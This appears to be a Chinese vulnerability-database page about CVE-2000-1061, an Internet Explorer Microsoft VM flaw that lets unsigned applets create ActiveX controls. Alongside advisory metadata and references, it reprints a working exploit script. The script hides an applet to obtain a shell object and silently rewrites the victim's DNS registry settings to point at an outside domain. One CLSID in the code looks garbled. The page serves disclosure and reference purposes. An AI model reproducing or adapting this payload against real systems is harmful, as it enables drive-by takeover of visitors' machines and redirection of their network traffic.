Internet Explorer Microsoft Virtual Machine (VM)安全设置绕过和命令执行漏洞

Internet Explorer Microsoft Virtual Machine (VM)安全设置绕过和命令执行漏洞

漏洞ID 1106027 漏洞类型 未知
发布时间 2000-10-05 更新时间 2005-10-12
图片[1]-Internet Explorer Microsoft Virtual Machine (VM)安全设置绕过和命令执行漏洞-安全小百科CVE编号 CVE-2000-1061
图片[2]-Internet Explorer Microsoft Virtual Machine (VM)安全设置绕过和命令执行漏洞-安全小百科CNNVD-ID CNNVD-200012-010
漏洞平台 Windows CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/20266
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-010
|漏洞详情
InternetExplorer4.x和5.x版本的MicrosoftVirtualMachine(VM)中的无符号程序可以创建和使用ActiveX控件,远程攻击者可以借助畸形web页面或邮件绕过InternetExplorer安全设置,并执行任意命令,该漏洞也称为“MicrosoftVMActiveXComponent”漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/1754/info

If a malicious website operator were to embed a specially crafted java object into a HTML document, it would be possible to execute arbitrary programs on a target host viewing the webpage through either Microsoft Internet Explorer or Outlook. The com.ms.activeX.ActiveXComponent java object inserted into an <APPLET> tag will allow the creation and scripting of arbitrary ActiveX objects even if they may present security hazards.

Even if Outlook has had the 'security update' applied, it is still possible to circumvent the disabling of active script execution through the use of java.

Execution of arbitrary programs could make it possible for the malicious website operator to gain rights equivalent to those of the current user. 

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{

Shl.RegWrite("HKLM\System\CurrentControlSet\Services\VxD\MSTCP\SearchList","roots-servers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-89400-0A0C9054228}");
try{

Shl.RegWrite("HKLM\System\CurrentControlSet\Services\VxD\MSTCP\EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>
|参考资料

来源:MS
名称:MS00-075
链接:http://www.microsoft.com/technet/security/bulletin/MS00-075.asp
来源:XF
名称:java-vm-applet
链接:http://xforce.iss.net/static/5127.php

相关推荐: HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerability

HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerability 漏洞ID 1098332 漏洞类型 Unknown 发布时间 2004-06-28 更新时间 2004-06-28 CVE编号 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享